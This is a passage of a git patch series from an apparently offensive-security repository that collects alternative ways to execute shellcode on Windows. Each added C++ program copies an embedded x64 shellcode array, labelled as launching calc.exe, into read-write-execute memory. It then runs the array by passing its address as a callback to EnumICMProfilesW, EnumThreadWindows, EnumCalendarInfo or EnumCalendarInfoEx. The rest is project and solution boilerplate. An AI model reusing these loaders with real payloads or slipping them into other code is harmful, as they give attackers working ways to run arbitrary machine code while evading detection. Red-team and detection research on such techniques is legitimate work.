rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 407afd0e5f4a8654463e3e0bcbf81e3b8cadd8ee Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sat, 12 Jun 2021 22:37:01 -0400 Subject: [PATCH 25/28] MEH --- AlternativeShellcodeExec.sln | 10 ++ EnumICMProfiles/EnumICMProfiles.cpp | 39 +++++ EnumICMProfiles/EnumICMProfiles.vcxproj | 147 ++++++++++++++++++ .../EnumICMProfiles.vcxproj.filters | 22 +++ 4 files changed, 218 insertions(+) create mode 100644 EnumICMProfiles/EnumICMProfiles.cpp create mode 100644 EnumICMProfiles/EnumICMProfiles.vcxproj create mode 100644 EnumICMProfiles/EnumICMProfiles.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index bd08621..dcae178 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -85,6 +85,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CryptEnumOIDInfo", "CryptEn EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumTimeFormatsEx", "EnumTimeFormatsEx\EnumTimeFormatsEx.vcxproj", "{5007CFB3-4072-4B23-9FF9-BDE0B75286F1}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumICMProfiles", "EnumICMProfiles\EnumICMProfiles.vcxproj", "{179D883D-4DC3-4EDB-848B-3FE8C3C5554C}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -421,6 +423,14 @@ Global {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x64.Build.0 = Release|x64 {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x86.ActiveCfg = Release|Win32 {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x86.Build.0 = Release|Win32 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Debug|x64.ActiveCfg = Debug|x64 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Debug|x64.Build.0 = Debug|x64 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Debug|x86.ActiveCfg = Debug|Win32 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Debug|x86.Build.0 = Debug|Win32 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x64.ActiveCfg = Release|x64 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x64.Build.0 = Release|x64 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x86.ActiveCfg = Release|Win32 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumICMProfiles/EnumICMProfiles.cpp b/EnumICMProfiles/EnumICMProfiles.cpp new file mode 100644 index 0000000..6fcfb70 --- /dev/null +++ b/EnumICMProfiles/EnumICMProfiles.cpp @@ -0,0 +1,39 @@ +// EnumICMProfiles.cpp : This file contains the 'main' function. Program execution begins and ends there. +// + +#include + +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + HDC dummy = GetDC(NULL); + EnumICMProfilesW(dummy, (ICMENUMPROCW)addr, NULL); + +} + diff --git a/EnumICMProfiles/EnumICMProfiles.vcxproj b/EnumICMProfiles/EnumICMProfiles.vcxproj new file mode 100644 index 0000000..dad3b55 --- /dev/null +++ b/EnumICMProfiles/EnumICMProfiles.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {179d883d-4dc3-4edb-848b-3fe8c3c5554c} + EnumICMProfiles + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumICMProfiles/EnumICMProfiles.vcxproj.filters b/EnumICMProfiles/EnumICMProfiles.vcxproj.filters new file mode 100644 index 0000000..e82fbb0 --- /dev/null +++ b/EnumICMProfiles/EnumICMProfiles.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 4a4d8461585e0a3bbab07a1580efb2dd319baa77 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 5 Dec 2021 19:45:36 -0500 Subject: [PATCH 26/28] i guess im working on this again.... --- AlternativeShellcodeExec.sln | 10 ++ EnumThreadWindows/EnumThreadWindows.cpp | 37 +++++ EnumThreadWindows/EnumThreadWindows.vcxproj | 147 ++++++++++++++++++ .../EnumThreadWindows.vcxproj.filters | 22 +++ 4 files changed, 216 insertions(+) create mode 100644 EnumThreadWindows/EnumThreadWindows.cpp create mode 100644 EnumThreadWindows/EnumThreadWindows.vcxproj create mode 100644 EnumThreadWindows/EnumThreadWindows.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index dcae178..84b41c7 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -87,6 +87,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumTimeFormatsEx", "EnumTi EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumICMProfiles", "EnumICMProfiles\EnumICMProfiles.vcxproj", "{179D883D-4DC3-4EDB-848B-3FE8C3C5554C}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumThreadWindows", "EnumThreadWindows\EnumThreadWindows.vcxproj", "{4DC52185-7351-4EFA-A364-65945302F470}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -431,6 +433,14 @@ Global {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x64.Build.0 = Release|x64 {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x86.ActiveCfg = Release|Win32 {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x86.Build.0 = Release|Win32 + {4DC52185-7351-4EFA-A364-65945302F470}.Debug|x64.ActiveCfg = Debug|x64 + {4DC52185-7351-4EFA-A364-65945302F470}.Debug|x64.Build.0 = Debug|x64 + {4DC52185-7351-4EFA-A364-65945302F470}.Debug|x86.ActiveCfg = Debug|Win32 + {4DC52185-7351-4EFA-A364-65945302F470}.Debug|x86.Build.0 = Debug|Win32 + {4DC52185-7351-4EFA-A364-65945302F470}.Release|x64.ActiveCfg = Release|x64 + {4DC52185-7351-4EFA-A364-65945302F470}.Release|x64.Build.0 = Release|x64 + {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.ActiveCfg = Release|Win32 + {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumThreadWindows/EnumThreadWindows.cpp b/EnumThreadWindows/EnumThreadWindows.cpp new file mode 100644 index 0000000..7fa46ad --- /dev/null +++ b/EnumThreadWindows/EnumThreadWindows.cpp @@ -0,0 +1,37 @@ +#include + + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + EnumThreadWindows(0, (WNDENUMPROC)addr, NULL); + + return 0; + +} \ No newline at end of file diff --git a/EnumThreadWindows/EnumThreadWindows.vcxproj b/EnumThreadWindows/EnumThreadWindows.vcxproj new file mode 100644 index 0000000..bc340f5 --- /dev/null +++ b/EnumThreadWindows/EnumThreadWindows.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {4dc52185-7351-4efa-a364-65945302f470} + EnumThreadWindows + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumThreadWindows/EnumThreadWindows.vcxproj.filters b/EnumThreadWindows/EnumThreadWindows.vcxproj.filters new file mode 100644 index 0000000..69e14d2 --- /dev/null +++ b/EnumThreadWindows/EnumThreadWindows.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 84424c6abd394abd4aae434f709301c5130cce78 Mon Sep 17 00:00:00 2001 From: S4R1N <37748671+S4R1N@users.noreply.github.com> Date: Thu, 9 Dec 2021 13:02:39 -0500 Subject: [PATCH 27/28] Create LICENSE --- LICENSE | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 LICENSE diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..cbd8faa --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2021 S4R1N + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. From fa503fd97646291c899d05863b7806970b9e01b6 Mon Sep 17 00:00:00 2001 From: Dani Kamanovsky Date: Sun, 16 Oct 2022 00:01:41 +0300 Subject: [PATCH 28/28] Adding EnumCalendarInfo & EnumCalendarInfoEx functions --- AlternativeShellcodeExec.sln | 20 +++ EnumCalendarInfo/EnumCalendarInfo.cpp | 30 ++++ EnumCalendarInfo/EnumCalendarInfo.vcxproj | 147 ++++++++++++++++++ EnumCalendarInfoEx/EnumCalendarInfoEx.cpp | 30 ++++ EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj | 147 ++++++++++++++++++ 5 files changed, 374 insertions(+) create mode 100644 EnumCalendarInfo/EnumCalendarInfo.cpp create mode 100644 EnumCalendarInfo/EnumCalendarInfo.vcxproj create mode 100644 EnumCalendarInfoEx/EnumCalendarInfoEx.cpp create mode 100644 EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 84b41c7..0cb9be6 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -89,6 +89,10 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumICMProfiles", "EnumICMP EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumThreadWindows", "EnumThreadWindows\EnumThreadWindows.vcxproj", "{4DC52185-7351-4EFA-A364-65945302F470}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumCalendarInfo", "EnumCalendarInfo\EnumCalendarInfo.vcxproj", "{5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumCalendarInfoEx", "EnumCalendarInfoEx\EnumCalendarInfoEx.vcxproj", "{DE7B0D0A-371D-4401-B2A2-A83E891AB90A}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -441,6 +445,22 @@ Global {4DC52185-7351-4EFA-A364-65945302F470}.Release|x64.Build.0 = Release|x64 {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.ActiveCfg = Release|Win32 {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.Build.0 = Release|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x64.ActiveCfg = Debug|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x64.Build.0 = Debug|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x86.ActiveCfg = Debug|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x86.Build.0 = Debug|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x64.ActiveCfg = Release|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x64.Build.0 = Release|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x86.ActiveCfg = Release|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x86.Build.0 = Release|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x64.ActiveCfg = Debug|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x64.Build.0 = Debug|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x86.ActiveCfg = Debug|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x86.Build.0 = Debug|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x64.ActiveCfg = Release|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x64.Build.0 = Release|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x86.ActiveCfg = Release|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumCalendarInfo/EnumCalendarInfo.cpp b/EnumCalendarInfo/EnumCalendarInfo.cpp new file mode 100644 index 0000000..42b1942 --- /dev/null +++ b/EnumCalendarInfo/EnumCalendarInfo.cpp @@ -0,0 +1,30 @@ +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + +int main() { + LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + ::EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); +} \ No newline at end of file diff --git a/EnumCalendarInfo/EnumCalendarInfo.vcxproj b/EnumCalendarInfo/EnumCalendarInfo.vcxproj new file mode 100644 index 0000000..02c3958 --- /dev/null +++ b/EnumCalendarInfo/EnumCalendarInfo.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F} + EnumCalendarInfo + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp b/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp new file mode 100644 index 0000000..a004353 --- /dev/null +++ b/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp @@ -0,0 +1,30 @@ +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + +int main() { + LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + ::EnumCalendarInfoEx((CALINFO_ENUMPROCEX)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); +} \ No newline at end of file diff --git a/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj b/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj new file mode 100644 index 0000000..a67cfdf --- /dev/null +++ b/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A} + EnumCalendarInfoEx + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file